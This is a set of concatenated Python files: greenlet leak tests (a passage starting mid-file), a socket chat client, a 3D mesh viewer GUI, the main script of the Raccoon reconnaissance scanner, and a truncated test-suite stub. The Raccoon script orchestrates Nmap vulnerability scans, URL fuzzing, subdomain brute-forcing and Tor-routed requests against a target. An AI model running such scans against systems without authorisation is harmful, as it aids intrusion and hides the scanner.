g = greenlet.greenlet(
lambda *args: greenlet.getcurrent().parent.switch(*args))
for _ in range(100):
g.switch(*args)
self.assertEqual(sys.getrefcount(args), refcount_before)
def test_kwarg_refs(self):
kwargs = {}
# pylint:disable=unnecessary-lambda
g = greenlet.greenlet(
lambda **kwargs: greenlet.getcurrent().parent.switch(**kwargs))
for _ in range(100):
g.switch(**kwargs)
self.assertEqual(sys.getrefcount(kwargs), 2)
@staticmethod
def __recycle_threads():
# By introducing a thread that does sleep we allow other threads,
# that have triggered their __block condition, but did not have a
# chance to deallocate their thread state yet, to finally do so.
# The way it works is by requiring a GIL switch (different thread),
# which does a GIL release (sleep), which might do a GIL switch
# to finished threads and allow them to clean up.
def worker():
time.sleep(0.001)
t = threading.Thread(target=worker)
t.start()
time.sleep(0.001)
t.join(10)
def test_threaded_leak(self):
gg = []
def worker():
# only main greenlet present
gg.append(weakref.ref(greenlet.getcurrent()))
for _ in range(2):
t = threading.Thread(target=worker)
t.start()
t.join(10)
del t
greenlet.getcurrent() # update ts_current
self.__recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertIsNone(g())
def test_threaded_adv_leak(self):
gg = []
def worker():
# main and additional *finished* greenlets
ll = greenlet.getcurrent().ll = []
def additional():
ll.append(greenlet.getcurrent())
for _ in range(2):
greenlet.greenlet(additional).switch()
gg.append(weakref.ref(greenlet.getcurrent()))
for _ in range(2):
t = threading.Thread(target=worker)
t.start()
t.join(10)
del t
greenlet.getcurrent() # update ts_current
self.__recycle_threads()
greenlet.getcurrent() # update ts_current
gc.collect()
greenlet.getcurrent() # update ts_current
for g in gg:
self.assertIsNone(g())
def assertClocksUsed(self):
used = greenlet._greenlet.get_clocks_used_doing_optional_cleanup()
self.assertGreaterEqual(used, 0)
# we don't lose the value
greenlet._greenlet.enable_optional_cleanup(True)
used2 = greenlet._greenlet.get_clocks_used_doing_optional_cleanup()
self.assertEqual(used, used2)
self.assertGreater(greenlet._greenlet.CLOCKS_PER_SEC, 1)
def _check_issue251(self,
manually_collect_background=True,
explicit_reference_to_switch=False):
# See https://github.com/python-greenlet/greenlet/issues/251
# Killing a greenlet (probably not the main one)
# in one thread from another thread would
# result in leaking a list (the ts_delkey list).
# We no longer use lists to hold that stuff, though.
# For the test to be valid, even empty lists have to be tracked by the
# GC
assert gc.is_tracked([])
HasFinalizerTracksInstances.reset()
greenlet.getcurrent()
greenlets_before = self.count_objects(greenlet.greenlet, exact_kind=False)
background_glet_running = threading.Event()
background_glet_killed = threading.Event()
background_greenlets = []
# XXX: Switching this to a greenlet subclass that overrides
# run results in all callers failing the leaktest; that
# greenlet instance is leaked. There's a bound method for
# run() living on the stack of the greenlet in g_initialstub,
# and since we don't manually switch back to the background
# greenlet to let it "fall off the end" and exit the
# g_initialstub function, it never gets cleaned up. Making the
# garbage collector aware of this bound method (making it an
# attribute of the greenlet structure and traversing into it)
# doesn't help, for some reason.
def background_greenlet():
# Throw control back to the main greenlet.
jd = HasFinalizerTracksInstances("DELETING STACK OBJECT")
greenlet._greenlet.set_thread_local(
'test_leaks_key',
HasFinalizerTracksInstances("DELETING THREAD STATE"))
# Explicitly keeping 'switch' in a local variable
# breaks this test in all versions
if explicit_reference_to_switch:
s = greenlet.getcurrent().parent.switch
s([jd])
else:
greenlet.getcurrent().parent.switch([jd])
bg_main_wrefs = []
def background_thread():
glet = greenlet.greenlet(background_greenlet)
bg_main_wrefs.append(weakref.ref(glet.parent))
background_greenlets.append(glet)
glet.switch() # Be sure it's active.
# Control is ours again.
del glet # Delete one reference from the thread it runs in.
background_glet_running.set()
background_glet_killed.wait(10)
# To trigger the background collection of the dead
# greenlet, thus clearing out the contents of the list, we
# need to run some APIs. See issue 252.
if manually_collect_background:
greenlet.getcurrent()
t = threading.Thread(target=background_thread)
t.start()
background_glet_running.wait(10)
greenlet.getcurrent()
lists_before = self.count_objects(list, exact_kind=True)
assert len(background_greenlets) == 1
self.assertFalse(background_greenlets[0].dead)
# Delete the last reference to the background greenlet
# from a different thread. This puts it in the background thread's
# ts_delkey list.
del background_greenlets[:]
background_glet_killed.set()
# Now wait for the background thread to die.
t.join(10)
del t
# As part of the fix for 252, we need to cycle the ceval.c
# interpreter loop to be sure it has had a chance to process
# the pending call.
self.wait_for_pending_cleanups()
lists_after = self.count_objects(list, exact_kind=True)
greenlets_after = self.count_objects(greenlet.greenlet, exact_kind=False)
# On 2.7, we observe that lists_after is smaller than
# lists_before. No idea what lists got cleaned up. All the
# Python 3 versions match exactly.
self.assertLessEqual(lists_after, lists_before)
# On versions after 3.6, we've successfully cleaned up the
# greenlet references thanks to the internal "vectorcall"
# protocol; prior to that, there is a reference path through
# the ``greenlet.switch`` method still on the stack that we
# can't reach to clean up. The C code goes through terrific
# lengths to clean that up.
if not explicit_reference_to_switch and greenlet._greenlet.get_clocks_used_doing_optional_cleanup() is not None:
# If cleanup was disabled, though, we may not find it.
self.assertEqual(greenlets_after, greenlets_before)
if manually_collect_background:
# TODO: Figure out how to make this work!
# The one on the stack is still leaking somehow
# in the non-manually-collect state.
self.assertEqual(HasFinalizerTracksInstances.EXTANT_INSTANCES, set())
else:
# The explicit reference prevents us from collecting it
# and it isn't always found by the GC either for some
# reason. The entire frame is leaked somehow, on some
# platforms (e.g., MacPorts builds of Python (all
# versions!)), but not on other platforms (the linux and
# windows builds on GitHub actions and Appveyor). So we'd
# like to write a test that proves that the main greenlet
# sticks around, and we can on my machine (macOS 11.6,
# MacPorts builds of everything) but we can't write that
# same test on other platforms. However, hopefully iteration
# done by leakcheck will find it.
pass
if greenlet._greenlet.get_clocks_used_doing_optional_cleanup() is not None:
self.assertClocksUsed()
def test_issue251_killing_cross_thread_leaks_list(self):
self._check_issue251()
def test_issue251_with_cleanup_disabled(self):
greenlet._greenlet.enable_optional_cleanup(False)
try:
self._check_issue251()
finally:
greenlet._greenlet.enable_optional_cleanup(True)
@fails_leakcheck
def test_issue251_issue252_need_to_collect_in_background(self):
# Between greenlet 1.1.2 and the next version, this was still
# failing because the leak of the list still exists when we
# don't call a greenlet API before exiting the thread. The
# proximate cause is that neither of the two greenlets from
# the background thread are actually being destroyed, even
# though the GC is in fact visiting both objects. It's not
# clear where that leak is? For some reason the thread-local
# dict holding it isn't being cleaned up.
#
# The leak, I think, is in the CPYthon internal function that
# calls into green_switch(). The argument tuple is still on
# the C stack somewhere and can't be reached? That doesn't
# make sense, because the tuple should be collectable when
# this object goes away.
#
# Note that this test sometimes spuriously passes on Linux,
# for some reason, but I've never seen it pass on macOS.
self._check_issue251(manually_collect_background=False)
@fails_leakcheck
def test_issue251_issue252_need_to_collect_in_background_cleanup_disabled(self):
self.expect_greenlet_leak = True
greenlet._greenlet.enable_optional_cleanup(False)
try:
self._check_issue251(manually_collect_background=False)
finally:
greenlet._greenlet.enable_optional_cleanup(True)
@fails_leakcheck
def test_issue251_issue252_explicit_reference_not_collectable(self):
self._check_issue251(
manually_collect_background=False,
explicit_reference_to_switch=True)
|
client.py | import socket
import threading
class Client:
def __init__(self):
self.create_connection()
def create_connection(self):
self.s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
try:
print('ITS VILLADA ##### Sala de chat de 7mo B')
host = input('Ingresá el IP del servidor --> ')
port = int(input('Ingresá el puerto --> '))
self.s.connect((host,port))
break
except:
print("Couldn't connect to server")
self.username = input('Ingresá tú username --> ')
self.s.send(self.username.encode())
message_handler = threading.Thread(target=self.handle_messages,args=())
message_handler.start()
input_handler = threading.Thread(target=self.input_handler,args=())
input_handler.start()
def handle_messages(self):
while 1:
print(self.s.recv(1204).decode())
def input_handler(self):
while 1:
self.s.send((self.username+' - '+input()).encode())
client = Client()
|
GUI.py | import ipywidgets as widgets
import pythreejs as three
from ..utils import ColorMap, Observer, utilities
from ..visualization import colors
from IPython.display import display as ipydisplay
import threading
from time import sleep
import numpy as np
class GUI(Observer):
def __init__(self, drawable_mesh):
self.drawable = drawable_mesh
self.mesh = drawable_mesh.geometry
self.mesh.attach(self)
self.widgets = []
self.click_picker = self.__initialize_picker()
self.old_picked_face = None
self.old_picked_face_internal = False
self.__clipping_in_queue = False
self.__dont_update_clipping = False
self.__create_UI()
#self.wireframe_thickness_slider.observe(self.__update_wireframe_thickness, names='value')
for widget in self.widgets:
ipydisplay(widget)
def __create_UI(self):
self.invisible_layout = {'display':'none', 'height' : 'auto'}
self.visible_layout = {'display':'', 'height' : 'auto'}
self.flip_button_layout = {'width': 'auto',
'margin': '0px 0px 0px 10px'}
self.picking_info_layout = {'width': 'auto',
'margin': '50px 50px 50px 0px'}
self.slider_layout = {
}
self.flip_x_button = widgets.ToggleButton(
value=False,
description='Flip x',
disabled=False,
button_style='info',
tooltip='Flip the visualization range on x axis',
layout=self.flip_button_layout
)
self.flip_y_button = widgets.ToggleButton(
value=False,
description='Flip y',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='IFlip the visualization range on y axis',
layout=self.flip_button_layout
)
self.flip_z_button = widgets.ToggleButton(
value=False,
description='Flip z',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Flip the visualization range on z axis',
layout=self.flip_button_layout
)
x_range = self.mesh.bbox[0][0], self.mesh.bbox[1][0]
x_step = abs(x_range[0]-x_range[1])/100
self.clipping_slider_x = widgets.FloatRangeSlider(
value=x_range,
min=x_range[0]-x_step,
max=x_range[1]+x_step,
step=x_step,
description='X Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
y_range = self.mesh.bbox[0][1], self.mesh.bbox[1][1]
y_step = abs(y_range[0]-y_range[1])/100
self.clipping_slider_y = widgets.FloatRangeSlider(
value = y_range,
min=y_range[0]-y_step,
max=y_range[1]+y_step,
step=y_step,
description='Y Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
z_range = self.mesh.bbox[0][2], self.mesh.bbox[1][2]
z_step = abs(z_range[0]-z_range[1])/100
self.clipping_slider_z = widgets.FloatRangeSlider(
value = z_range,
min = z_range[0]-z_step,
max = z_range[1]+z_step,
step=z_step,
description='Z Clipping:',
disabled=False,
continuous_update=True,
orientation='horizontal',
readout=True,
readout_format=".1f",
layout=self.slider_layout
)
self.wireframe_opacity_slider = widgets.FloatSlider(
value=0.4,
min=0.,
max=1.,
step=0.1,
continuous_update=True,
readout_format=".1f",
description = 'Wireframe',
disable = False,
)
self.color_wireframe = widgets.ColorPicker(
concise=True,
value=self.drawable.wireframe.material.color,
disabled=False,
layout={'margin': '0 0 0 10px'}
)
self.enable_picking_button = widgets.ToggleButton(
value=False,
description='Show Picking Info',
disabled=False,
button_style='info', # 'success', 'info', 'warning', 'danger' or ''
tooltip='Enable the picking functionality',
layout=self.picking_info_layout
)
self.picking_label = widgets.Label(
llayout=self.invisible_layout,
disabled=False,
continuous_update=True
)
tab_titles = ['Poly', 'Vertex']
children = [
widgets.HTML(
value="",
layout={'width': '100','margin': '50 0 0 0'},
disabled=False,
continuous_update=True
) for title in tab_titles]
self.picking_tab = widgets.Tab(layout=self.invisible_layout,
disabled=True,
width=300,
height=400)
self.picking_tab.children = children
for i in range(len(children)):
self.picking_tab.set_title(i, tab_titles[i])
self.color_picking_label = widgets.Label(
value="Click Color ",
layout=self.invisible_layout,
disabled=False,
continuous_update=True
)
self.color_map = widgets.Dropdown(
options=[(i, idx) for idx, i in enumerate(ColorMap.color_maps.keys())],
value=0,
description='Color-Map:',
layout = self.invisible_layout,
)
self.widgets += [self.color_map]
self.metric_menu = widgets.Dropdown(
options= [(i, idx) for idx, i in enumerate(self.mesh.simplex_metrics.keys())],
value=0,
description='Metric:',
layout = self.invisible_layout,
)
self.widgets += [self.metric_menu]
self.coloring_type_menu = widgets.Dropdown(
options=[('Default', 0), ('Simplex Quality', 1), ('Label',2)],
value=0,
description='Color Type:',
)
self.widgets += [
widgets.HBox([
widgets.VBox([
widgets.HBox([
self.clipping_slider_x, self.flip_x_button
]),
widgets.HBox([
self.clipping_slider_y, self.flip_y_button
]),
widgets.HBox([
self.clipping_slider_z, self.flip_z_button
]),
widgets.HBox([
self.wireframe_opacity_slider, self.color_wireframe
]),
widgets.HBox([
self.coloring_type_menu
]),
widgets.VBox([
widgets.HBox(
[
self.enable_picking_button
]
),
widgets.HBox([
self.picking_label
]),
widgets.HBox([
self.picking_tab
]),
])
]),
]),
]
mesh_colors = []
if hasattr(self.mesh, "internals"):
self.color_internal = widgets.ColorPicker(
concise=True,
description='Internal',
value=colors.rgb2hex(self.drawable._internal_color),
disabled=False,
)
mesh_colors += [self.color_internal]
self.color_picking = widgets.ColorPicker(
concise=True,
description="Click Color",
value=colors.rgb2hex(colors.purple),
layout = self.invisible_layout,
disabled=False,
)
self.color_external = widgets.ColorPicker(
concise=True,
description='External',
value=colors.rgb2hex(self.drawable._external_color),
disabled=False,
)
mesh_colors += [self.color_external]
mesh_colors += [self.color_picking]
self.widgets += [widgets.HBox(mesh_colors)]
self.color_label_pickers = [widgets.ColorPicker(
concise=True,
description='Label ' + str(i),
value= colors.random_color(return_hex=True),
disabled=False,
layout = self.visible_layout,
) for i in np.unique(self.mesh.labels)]
self.color_label_pickers = widgets.HBox(self.color_label_pickers, layout=self.invisible_layout)
self.widgets += [self.color_label_pickers]
self.flip_x_button.observe(self.__update_clipping, names='value')
self.flip_y_button.observe(self.__update_clipping, names='value')
self.flip_z_button.observe(self.__update_clipping, names='value')
self.clipping_slider_x.observe(self.__update_clipping, names='value')
self.clipping_slider_y.observe(self.__update_clipping, names='value')
self.clipping_slider_z.observe(self.__update_clipping, names='value')
if hasattr(self.mesh, "internals"):
self.color_internal.observe(self.__update_internal_color, names='value')
self.color_external.observe(self.__update_external_color, names='value')
self.color_wireframe.observe(self.__update_wireframe_color, names='value')
self.wireframe_opacity_slider.observe(self.__update_wireframe_opacity, names='value')
self.coloring_type_menu.observe(self.__change_color_type, names='value')
self.color_map.observe(self.__change_color_map, names='value')
self.metric_menu.observe(self.__change_metric, names='value')
self.enable_picking_button.observe(self.__toggle_picking, names='value')
self.click_picker.observe(self.on_click, names=['point'])
[i.observe(self.__change_color_label,names='value') for i in self.color_label_pickers.children]
def __update_wireframe_color(self, change):
self.drawable.update_wireframe_color(self.color_wireframe.value)
def __update_wireframe_opacity(self, change):
self.drawable.update_wireframe_opacity(self.wireframe_opacity_slider.value)
def __update_internal_color(self, change):
if hasattr(self.mesh, "internals"):
self.drawable.update_internal_color(colors.hex2rgb(self.color_internal.value))
def __update_external_color(self, change):
self.drawable.update_external_color(colors.hex2rgb(self.color_external.value))
def __change_color_type(self, change):
if self.coloring_type_menu.value == 0:
self.color_map.layout = self.invisible_layout
self.metric_menu.layout = self.invisible_layout
self.color_external.layout = self.visible_layout
if hasattr(self.mesh, "internals"):
self.color_internal.layout = self.visible_layout
self.color_label_pickers.layout = self.invisible_layout
self.drawable._label_colors = None
self.drawable._color_map = None
self.__update_external_color(None)
self.__update_internal_color(None)
elif self.coloring_type_menu.value == 1:
self.color_map.layout = self.visible_layout
self.metric_menu.layout = self.visible_layout
self.color_external.layout = self.invisible_layout
if hasattr(self.mesh, "internals"):
self.color_internal.layout = self.invisible_layout
self.color_label_pickers.layout = self.invisible_layout
self.drawable._label_colors = None
self.__change_color_map(None)
elif self.coloring_type_menu.value == 2:
self.color_external.layout = self.invisible_layout
if hasattr(self.mesh, "internals"):
self.color_internal.layout = self.invisible_layout
self.color_map.layout = self.invisible_layout
self.metric_menu.layout = self.invisible_layout
if self.mesh.labels is not None:
self.color_label_pickers.layout = self.visible_layout
self.__change_color_label(None)
def __initialize_picker(self):
pickable_objects = self.drawable.mesh
picker = three.Picker(controlling=pickable_objects, event='click')
return picker
def __change_metric(self, change):
self.__change_color_map(None)
def __change_color_label(self, change):
self.drawable._label_colors = {int(i.description.split()[1]): colors.hex2rgb(i.value) for i in self.color_label_pickers.children}
self.drawable.update_color_label()
def __change_color_map(self, change):
metric_string = list(self.mesh.simplex_metrics.keys())[self.metric_menu.value]
c_map_string = list(ColorMap.color_maps.keys())[self.color_map.value]
self.drawable.compute_color_map(metric_string, c_map_string)
def __clipping_updater(self):
self.__dont_update_clipping = True
flip_x = self.flip_x_button.value
flip_y = self.flip_y_button.value
flip_z = self.flip_z_button.value
min_x, max_x = self.clipping_slider_x.value
min_y, max_y = self.clipping_slider_y.value
min_z, max_z = self.clipping_slider_z.value
self.mesh.set_clipping(min_x = min_x, max_x = max_x,
min_y = min_y, max_y = max_y,
min_z = min_z, max_z = max_z,
flip_x = flip_x, flip_y = flip_y, flip_z = flip_z)
if self.__clipping_in_queue:
self.__clipping_in_queue = False
self.__dont_update_clipping = False
self.__update_clipping(None)
else:
self.__dont_update_clipping = False
def on_click(self, change):
if not self.enable_picking_button.value:
return
geometry_type = str(type(self.drawable.geometry))
# if nothing is clicked
if change.owner.object is None:
self.picking_label.value = "Nothing found"
self.picking_tab.children[0].value = ' '
self.picking_tab.children[1].value = ' '
else:
# click_operations is called based on the number of triangles per poly of the geometry
if "Quadmesh" in geometry_type:
self.click_operations(change, 2)
elif "Tetmesh" in geometry_type:
self.click_operations(change, 4)
elif "Hexmesh" in geometry_type:
self.click_operations(change, 12)
else:
# Trimesh
self.click_operations(change, 1)
def click_operations(self, change, num_triangles):
poly_index = change.owner.faceIndex // num_triangles
coords = change['new']
internal = False
if num_triangles <= 2:
vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
elif num_triangles == 4:
poly_index = poly_index + self.drawable.geometry._map_poly_indices[poly_index]
if self.drawable.geometry.internals[poly_index]:
internal = True
vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
else:
poly_index = poly_index + self.drawable.geometry._map_poly_indices[poly_index]
if self.drawable.geometry.internals[poly_index]:
internal = True
vertices = np.array(self.drawable.geometry.polys[poly_index]).astype("int32")
vertex_coords = np.array([self.drawable.geometry.vertices[vrtx] for vrtx in vertices]).astype("float32")
nearest_vertex, nearest_vertex_coords = self.find_nearest_vertex(vertices, vertex_coords, change.owner.point)
nearest_faces = np.array(self.drawable.geometry.adj_vtx2poly[nearest_vertex]).astype("int32")
if self.old_picked_face is not None:
self.__change_color_type(None)
self.old_picked_face = poly_index
self.old_picked_face_internal = internal
# [self.drawable.update_external_color(colors.hex2rgb(self.color_picking.value), poly_index=triangle, geometry=None) for triangle in triangles]
self.drawable.update_poly_color(colors.hex2rgb(self.color_picking.value), poly_index=poly_index,num_triangles=num_triangles)
self.picking_label.value = 'Clicked on (%.3f, %.3f, %.3f)' % tuple(coords)
self.picking_tab.children[0].value = 'Poly index: %d' % poly_index + '<br>'
self.picking_tab.children[0].value += 'Vertex indices: '
self.picking_tab.children[0].value += ', '.join([str(v) for v in vertices]) + '<br>'
self.picking_tab.children[0].value += ''.join(
'Vertex ' + str(a) + ' coords: (%.3f, %.3f, %.3f)' % tuple(b) + '<br>' for a, b in
zip(vertices, vertex_coords))
self.picking_tab.children[1].value = 'Vertex index: %d' % nearest_vertex + '<br>'
self.picking_tab.children[1].value += 'Vertex coords: (%.3f, %.3f, %.3f)' % tuple(nearest_vertex_coords) + '<br>'
self.picking_tab.children[1].value += 'Nearest Polys: '
self.picking_tab.children[1].value += ', '.join([str(v) for v in nearest_faces]) + '<br>'
def __toggle_picking(self, change):
if self.enable_picking_button.value:
self.picking_tab.layout = {'margin': '0 0 0 20px'}
self.picking_label.layout = {'margin': '0 0 0 20px'}
self.enable_picking_button.description = 'Hide Picking Info'
self.color_picking.layout = self.visible_layout
else:
self.picking_tab.layout = self.invisible_layout
self.picking_label.layout = self.invisible_layout
self.color_picking.layout = self.invisible_layout
self.enable_picking_button.description = 'Show Picking Info'
self.__change_color_type(None)
def __update_clipping(self, change):
if self.__dont_update_clipping:
self.__clipping_in_queue = True
else:
thread = threading.Thread(target=self.__clipping_updater, args=())
thread.daemon = True
thread.start()
def update(self):
clipping = self.mesh.clipping
flips = clipping.flip
flip_x = flips.x
flip_y = flips.y
flip_z = flips.z
x_range = clipping.min_x, clipping.max_x
y_range = clipping.min_y, clipping.max_y
z_range = clipping.min_z, clipping.max_z
self.flip_x_button.value = flip_x
self.flip_y_button.value = flip_y
self.flip_z_button.value = flip_z
self.clipping_slider_x.value = x_range
self.clipping_slider_y.value = y_range
self.clipping_slider_z.value = z_range
@staticmethod
def find_nearest_vertex(vertexes, vertex_coords, click_coords):
dist = [np.linalg.norm(click_coords - vertex) for vertex in vertex_coords]
return vertexes[dist.index(min(dist))], vertex_coords[dist.index(min(dist))] |
main.py | import time
import asyncio
import threading
import click
import sys
import os
# Python imports will be the end of us all
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.1")
@click.option("-t", "--target", required=True, help="Target to scan")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "vulners_nse/vulners.nse"),
help="Path to the nmap_vulners.nse script.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host, port, vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(host, full_scan, scripts, services, port)
# # # TODO: Populate array when multiple targets are supported
# nmap_threads = []
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
if __name__ == "__main__":
main()
|
TestSuite.py | import logging
from .server import server
from threading import Thread
import time
_Tests = []
def test(func):
"""register function to test suite"""
_Tests.append(_Test(func))
def rerun():
global _Tests
_Tests = [_Test(t.function) for t in _Tests]
runTests()
def runTests():
